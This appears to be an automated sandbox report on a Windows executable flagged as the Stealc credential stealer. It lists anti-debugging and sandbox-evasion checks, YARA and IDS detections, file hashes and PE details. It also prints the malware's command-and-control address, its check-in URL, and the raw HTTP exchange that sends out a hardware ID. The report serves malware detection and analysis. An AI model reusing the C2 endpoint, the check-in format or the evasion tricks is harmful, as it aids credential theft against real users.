                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01013EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_01013EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0100F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0100F6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010016D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_010016D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01001160 GetSystemInfo,ExitProcess,0_2_01001160
                Source: file.exe, file.exe, 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.1779494572.00000000018DA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%
                Source: file.exe, 00000000.00000002.1779494572.00000000018C2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1779494572.00000000018FB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.1779494572.000000000187E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13275
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13278
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13329
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13295
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13289
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Hides threads from debuggers
                Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                Tries to detect sandboxes and other dynamic analysis tools (window names)
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010045C0 VirtualProtect ?,00000004,00000100,000000000_2_010045C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01019860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_01019860
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01019750 mov eax, dword ptr fs:[00000030h]0_2_01019750
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01017850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_01017850
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Yara detected Powershell download and execute
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 6704, type: MEMORYSTR
                Searches for specific processes (likely to inject)
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01019600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_01019600
                Source: file.exe, file.exe, 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Program Manager
                Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_01017B90
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01016920 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,0_2_01016920
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01017850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_01017850
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01017A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_01017A30

                Stealing of Sensitive Information

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.1000000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000003.1737937946.00000000054D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1779494572.000000000187E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 6704, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Remote Access Functionality

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.1000000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000003.1737937946.00000000054D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1779494572.000000000187E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 6704, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Command and Scripting Interpreter                		1
                DLL Side-Loading                		11
                Process Injection                		1
                Masquerading                		OS Credential Dumping2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		2
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts11
                Native API                		Boot or Logon Initialization Scripts1
                DLL Side-Loading                		33
                Virtualization/Sandbox Evasion                		LSASS Memory641
                Security Software Discovery                		Remote Desktop ProtocolData from Removable Media2
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                Disable or Modify Tools                		Security Account Manager33
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared Drive2
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                Process Injection                		NTDS13
                Process Discovery                		Distributed Component Object ModelInput Capture12
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets1
                Account Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                Obfuscated Files or Information                		Cached Domain Credentials1
                System Owner/User Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                Software Packing                		DCSync1
                File and Directory Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                DLL Side-Loading                		Proc Filesystem324
                System Information Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                file.exe100%AviraTR/Crypt.TPM.Gen
                file.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://185.215.113.37/100%URL Reputationmalware
                http://185.215.113.37/100%URL Reputationmalware
                http://185.215.113.37100%URL Reputationmalware
                http://185.215.113.37/e2b1563c6670f193.php100%URL Reputationmalware
                http://185.215.113.37/e2b1563c6670f193.php#19%VirustotalBrowse

                Domains and IPs

                Contacted Domains

                No contacted domains info

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://185.215.113.37/true
                • URL Reputation: malware
                • URL Reputation: malware
                		unknown
                http://185.215.113.37/e2b1563c6670f193.phptrue
                • URL Reputation: malware
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://185.215.113.37mfile.exe, 00000000.00000002.1779494572.000000000187E000.00000004.00000020.00020000.00000000.sdmptrue
                  		unknown
                  http://185.215.113.37/$(file.exe, 00000000.00000002.1779494572.00000000018DA000.00000004.00000020.00020000.00000000.sdmptrue
                    		unknown
                    http://185.215.113.37file.exe, 00000000.00000002.1779494572.000000000187E000.00000004.00000020.00020000.00000000.sdmptrue
                    • URL Reputation: malware
                    		unknown
                    http://185.215.113.37/e2b1563c6670f193.php#file.exe, 00000000.00000002.1779494572.00000000018F2000.00000004.00000020.00020000.00000000.sdmptrueunknown
                    http://185.215.113.37/:(file.exe, 00000000.00000002.1779494572.00000000018DA000.00000004.00000020.00020000.00000000.sdmptrue
                      		unknown

                      World Map of Contacted IPs

                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs

                      Public IPs

                      IPDomainCountryFlagASNASN NameMalicious
                      185.215.113.37
                      		unknownPortugal
                      		206894WHOLESALECONNECTIONSNLtrue

                      General Information

                      Joe Sandbox version:41.0.0 Charoite
                      Analysis ID:1522422
                      Start date and time:2024-09-30 02:00:09 +02:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 2m 54s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                      Number of analysed new started processes analysed:2
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Sample name:file.exe
                      Detection:MAL
                      Classification:mal100.troj.evad.winEXE@1/0@0/1
                      EGA Information:
                      • Successful, ratio: 100%
                      HCA Information:
                      • Successful, ratio: 80%
                      • Number of executed functions: 19
                      • Number of non-executed functions: 81
                      Cookbook Comments:
                      • Found application associated with file extension: .exe
                      • Stop behavior analysis, all processes terminated

                      Warnings

                      • Exclude process from analysis (whitelisted): dllhost.exe
                      • Excluded IPs from analysis (whitelisted): 20.114.59.183, 93.184.221.240
                      • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, wu.ec.azureedge.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, sls.update.microsoft.com, hlb.apr-52dd2-0.edgecastdns.net, ctldl.windowsupdate.com, wu-b-net.trafficmanager.net, wu.azureedge.net, glb.sls.prod.dcat.dsp.trafficmanager.net
                      • Report size getting too big, too many NtQueryValueKey calls found.

                      Simulations

                      Behavior and APIs

                      No simulations

                      Joe Sandbox View / Context

                      IPs

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      185.215.113.37file.exeGet hashmaliciousStealc, VidarBrowse
                      • 185.215.113.37/e2b1563c6670f193.php
                      file.exeGet hashmaliciousAmadey, StealcBrowse
                      • 185.215.113.37/e2b1563c6670f193.php
                      file.exeGet hashmaliciousStealcBrowse
                      • 185.215.113.37/e2b1563c6670f193.php
                      file.exeGet hashmaliciousStealcBrowse
                      • 185.215.113.37/e2b1563c6670f193.php
                      file.exeGet hashmaliciousStealcBrowse
                      • 185.215.113.37/e2b1563c6670f193.php
                      file.exeGet hashmaliciousStealcBrowse
                      • 185.215.113.37/e2b1563c6670f193.php
                      file.exeGet hashmaliciousStealcBrowse
                      • 185.215.113.37/e2b1563c6670f193.php
                      file.exeGet hashmaliciousStealc, VidarBrowse
                      • 185.215.113.37/e2b1563c6670f193.php
                      file.exeGet hashmaliciousStealcBrowse
                      • 185.215.113.37/e2b1563c6670f193.php
                      file.exeGet hashmaliciousStealc, VidarBrowse
                      • 185.215.113.37/e2b1563c6670f193.php

                      Domains

                      No context

                      ASNs

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousStealc, VidarBrowse
                      • 185.215.113.37
                      file.exeGet hashmaliciousAmadey, StealcBrowse
                      • 185.215.113.103
                      file.exeGet hashmaliciousStealcBrowse
                      • 185.215.113.37
                      file.exeGet hashmaliciousStealcBrowse
                      • 185.215.113.37
                      file.exeGet hashmaliciousStealcBrowse
                      • 185.215.113.37
                      file.exeGet hashmaliciousStealcBrowse
                      • 185.215.113.37
                      file.exeGet hashmaliciousStealcBrowse
                      • 185.215.113.37
                      file.exeGet hashmaliciousStealc, VidarBrowse
                      • 185.215.113.37
                      file.exeGet hashmaliciousStealcBrowse
                      • 185.215.113.37
                      file.exeGet hashmaliciousStealc, VidarBrowse
                      • 185.215.113.37

                      JA3 Fingerprints

                      No context

                      Dropped Files

                      No context

                      Created / dropped Files

                      No created / dropped files found

                      Static File Info

                      General

                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                      Entropy (8bit):7.947385762179823
                      TrID:
                      • Win32 Executable (generic) a (10002005/4) 99.96%
                      • Generic Win/DOS Executable (2004/3) 0.02%
                      • DOS Executable Generic (2002/1) 0.02%
                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                      File name:file.exe
                      File size:1'808'384 bytes
                      MD5:e3989af8cb5908ba300311259af23245
                      SHA1:0013081341d0faf8d7b9a9a20d75310d8b9c13fa
                      SHA256:665f8ded044e58e1900e7441cc75ebbc9438f9a6a0fde9528698dab670966203
                      SHA512:4af313373b2a17f9d877ec6761cd137ea030aa39f0a430911f6c44b88b6a7f98deebb065cc7859c4eb6a6e70aeb7b4a505ae034402eeed904a36b9ddc2fa490b
                      SSDEEP:24576:YVOgpgidgEO5ukRt5/EoQKdkPmmXRZOY5yuLRyu1dEvMznFh67fd8/GChwAc1:MKEWuIt5Monc7OFcDdEEjre8/Nn
                      TLSH:F5853332EB32A3F5DFB78C75DA6F9A80A464C3252B9D6B6C5180823CEC7B744857940D
                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........

                      File Icon

                      Icon Hash:90cececece8e8eb0

                      Static PE Info

                      General

                      Entrypoint:0xa89000
                      Entrypoint Section:.taggant
                      Digitally signed:false
                      Imagebase:0x400000
                      Subsystem:windows gui
                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                      DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                      Time Stamp:0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
                      TLS Callbacks:
                      CLR (.Net) Version:
                      OS Version Major:5
                      OS Version Minor:1
                      File Version Major:5
                      File Version Minor:1
                      Subsystem Version Major:5
                      Subsystem Version Minor:1
                      Import Hash:2eabe9054cad5152567f0699947a2c5b

                      Entrypoint Preview

                      Instruction
                      jmp 00007F9844E34B3Ah
                      pcmpeqd mm3, qword ptr [ebx]
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add cl, ch
                      add byte ptr [eax], ah
                      add byte ptr [eax], al
                      add byte ptr [edx+ecx], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      xor byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [edx], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      or al, 80h
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      adc byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add al, 0Ah
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      adc byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add ecx, dword ptr [edx]
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      or byte ptr [eax+00000000h], al
                      add byte ptr [eax], al
                      adc byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add al, 0Ah
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      xor byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax+00000000h], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add dword ptr [eax+00000000h], eax
                      add byte ptr [eax], al
                      adc byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add ecx, dword ptr [edx]
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      xor byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      push es
                      add byte ptr [eax], 00000000h
                      add byte ptr [eax], al
                      add byte ptr [eax], al

                      Rich Headers

                      Programming Language:
                      • [C++] VS2010 build 30319
                      • [ASM] VS2010 build 30319
                      • [ C ] VS2010 build 30319
                      • [ C ] VS2008 SP1 build 30729
                      • [IMP] VS2008 SP1 build 30729
                      • [LNK] VS2010 build 30319

                      Data Directories

                      NameVirtual AddressVirtual Size Is in Section
                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_IMPORT0x25d0500x64.idata
                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x25d1f80x8.idata
                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                      Sections

                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                      0x10000x25b0000x228004dd8360c3a41f9e101a9dc387a144950unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      .rsrc 0x25c0000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      .idata 0x25d0000x10000x200c60c4959cc8d384ac402730cc6842bb0False0.1328125data0.9064079259880791IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      0x25e0000x2960000x20082b8d7deb73e702d92ced27a8c01aff1unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      exwozbij0x4f40000x1940000x193600766bca38bd874d0c9f49d3b37f717f3aFalse0.9950333610938953data7.953490732533179IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      werwxfcu0x6880000x10000x400123bbdc990f2623919013aeb1bb2ba4bFalse0.7587890625data5.990747173738001IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      .taggant0x6890000x30000x2200f11f8e563fb110ae7c0f67340c3e59a9False0.0627297794117647DOS executable (COM)0.8284828838499194IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                      Imports

                      DLLImport
                      kernel32.dlllstrcpy

                      Network Behavior

                      Suricata IDS Alerts

                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                      2024-09-30T02:01:09.384981+02002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.449730185.215.113.3780TCP

                      Network Port Distribution

                      TCP Packets

                      TimestampSource PortDest PortSource IPDest IP
                      Sep 30, 2024 02:01:08.423830032 CEST4973080192.168.2.4185.215.113.37
                      Sep 30, 2024 02:01:08.428821087 CEST8049730185.215.113.37192.168.2.4
                      Sep 30, 2024 02:01:08.428920984 CEST4973080192.168.2.4185.215.113.37
                      Sep 30, 2024 02:01:08.429101944 CEST4973080192.168.2.4185.215.113.37
                      Sep 30, 2024 02:01:08.433847904 CEST8049730185.215.113.37192.168.2.4
                      Sep 30, 2024 02:01:09.151237011 CEST8049730185.215.113.37192.168.2.4
                      Sep 30, 2024 02:01:09.151521921 CEST4973080192.168.2.4185.215.113.37
                      Sep 30, 2024 02:01:09.154436111 CEST4973080192.168.2.4185.215.113.37
                      Sep 30, 2024 02:01:09.159308910 CEST8049730185.215.113.37192.168.2.4
                      Sep 30, 2024 02:01:09.384881020 CEST8049730185.215.113.37192.168.2.4
                      Sep 30, 2024 02:01:09.384980917 CEST4973080192.168.2.4185.215.113.37
                      Sep 30, 2024 02:01:12.940280914 CEST4973080192.168.2.4185.215.113.37

                      HTTP Request Dependency Graph

                      • 185.215.113.37

                      HTTP Packets

                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      0192.168.2.449730185.215.113.37806704C:\Users\user\Desktop\file.exe
                      TimestampBytes transferredDirectionData
                      Sep 30, 2024 02:01:08.429101944 CEST89OUTGET / HTTP/1.1
                      Host: 185.215.113.37
                      Connection: Keep-Alive
                      Cache-Control: no-cache
                      Sep 30, 2024 02:01:09.151237011 CEST203INHTTP/1.1 200 OK
                      Date: Mon, 30 Sep 2024 00:01:09 GMT
                      Server: Apache/2.4.52 (Ubuntu)
                      Content-Length: 0
                      Keep-Alive: timeout=5, max=100
                      Connection: Keep-Alive
                      Content-Type: text/html; charset=UTF-8
                      Sep 30, 2024 02:01:09.154436111 CEST412OUTPOST /e2b1563c6670f193.php HTTP/1.1
                      Content-Type: multipart/form-data; boundary=----ECGDHIDAAFHIIDGDBFIE
                      Host: 185.215.113.37
                      Content-Length: 211
                      Connection: Keep-Alive
                      Cache-Control: no-cache
                      Data Raw: 2d 2d 2d 2d 2d 2d 45 43 47 44 48 49 44 41 41 46 48 49 49 44 47 44 42 46 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 45 34 30 45 46 44 43 45 44 32 33 31 38 31 37 37 30 34 35 37 31 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 44 48 49 44 41 41 46 48 49 49 44 47 44 42 46 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 44 48 49 44 41 41 46 48 49 49 44 47 44 42 46 49 45 2d 2d 0d 0a
                      Data Ascii: ------ECGDHIDAAFHIIDGDBFIEContent-Disposition: form-data; name="hwid"5E40EFDCED231817704571------ECGDHIDAAFHIIDGDBFIEContent-Disposition: form-data; name="build"doma------ECGDHIDAAFHIIDGDBFIE--
                      Sep 30, 2024 02:01:09.384881020 CEST210INHTTP/1.1 200 OK
                      Date: Mon, 30 Sep 2024 00:01:09 GMT
                      Server: Apache/2.4.52 (Ubuntu)
                      Content-Length: 8
                      Keep-Alive: timeout=5, max=99
                      Connection: Keep-Alive
                      Content-Type: text/html; charset=UTF-8
                      Data Raw: 59 6d 78 76 59 32 73 3d
                      Data Ascii: YmxvY2s=


                      Statistics

                      CPU Usage

                      Click to jump to process

                      Memory Usage

                      Click to jump to process

                      High Level Behavior Distribution

                      Click to dive into process behavior distribution

                      System Behavior

                      General

                      Target ID:0
                      Start time:20:01:03
                      Start date:29/09/2024
                      Path:C:\Users\user\Desktop\file.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Users\user\Desktop\file.exe"
                      Imagebase:0x1000000
                      File size:1'808'384 bytes
                      MD5 hash:E3989AF8CB5908BA300311259AF23245
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.1737937946.00000000054D0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1779494572.000000000187E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                      Reputation:low
                      Has exited:true

                      Disassembly

                      Reset < >

                        Execution Graph

                        Execution Coverage:8.7%
                        Dynamic/Decrypted Code Coverage:0%
                        Signature Coverage:9.7%
                        Total number of Nodes:2000
                        Total number of Limit Nodes:24
